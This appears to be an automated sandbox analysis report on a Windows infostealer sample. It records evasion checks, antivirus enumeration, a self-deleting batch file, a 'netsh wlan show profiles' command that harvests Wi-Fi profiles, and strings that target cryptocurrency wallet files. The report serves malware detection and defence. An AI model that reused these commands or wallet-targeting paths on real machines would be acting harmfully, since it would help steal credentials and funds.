    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: VaXmr82RIb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: VaXmr82RIb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: VaXmr82RIb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: System.Xml.pdbHx source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Xml.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: mscorlib.pdb@ source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DA5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Drawing.pdbRSDSp source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Configuration.pdb0$; source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: Stealer.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: ntkrnlmp.pdb source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DA5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.IO.Compression.pdbu source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Net.Http.pdbMZ source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Configuration.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Net.Http.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Security.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.IO.Compression.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: (3)\Stealer\obj\Release\Stealer.pdb source: VaXmr82RIb.exe
    Source: Binary string: System.Configuration.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Xml.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Core.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Windows.Forms.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: mscorlib.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: (3)\Stealer\obj\Release\Stealer.pdb, source: VaXmr82RIb.exe
    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Net.Http.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Management.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Drawing.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: mscorlib.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Management.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Core.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata*4&)G source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DC4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS] source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Management.pdb.> source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.ni.pdb source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
    Source: Binary string: System.Security.pdb8 source: WER9BB8.tmp.dmp.17.dr
    Source: VaXmr82RIb.exeStatic PE information: 0xF12D1FC7 [Fri Mar 21 18:51:51 2098 UTC]
    Source: initial sampleStatic PE information: section where entry point is pointing to: .4j;
    Source: VaXmr82RIb.exeStatic PE information: section name: .<':
    Source: VaXmr82RIb.exeStatic PE information: section name: .#x#
    Source: VaXmr82RIb.exeStatic PE information: section name: .4j;
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_0360A03C pushfd ; ret 0_2_0360A0C1
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_036216FC push eax; mov dword ptr [esp], ecx0_2_0362171C
    Source: VaXmr82RIb.exeStatic PE information: section name: .4j; entropy: 7.738212847633549

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 1488
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49747
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeMemory allocated: 3460000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeMemory allocated: 3640000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeMemory allocated: 5640000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeMemory allocated: 5B20000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeMemory allocated: 7B20000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeMemory allocated: 7D60000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeMemory allocated: 9D60000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWindow / User API: threadDelayed 9772Jump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: VaXmr82RIb.exeBinary or memory string: IsVirtualMachine
    Source: VaXmr82RIb.exe, 00000000.00000002.30073132207.0000000001895000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: VaXmr82RIb.exeBinary or memory string: <IsVirtualMachine>b__1_0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 3364Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 3364Jump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeQueries volume information: C:\Users\user\Desktop\VaXmr82RIb.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: VaXmr82RIb.exe, 00000000.00000002.30087188792.0000000007EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: VaXmr82RIb.exe, 00000000.00000002.30087188792.0000000007EF4000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30083365298.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30088042498.0000000008360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

    Stealing of Sensitive Information

    barindex
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx`,jq
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $jq4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-jq
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $jq1C:\Users\user\AppData\Roaming\Ethereum\keystoret-jq
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3 WalletLRjqHDp
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $jq5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-jq
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $jq1C:\Users\user\AppData\Roaming\Ethereum\keystoret-jq
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
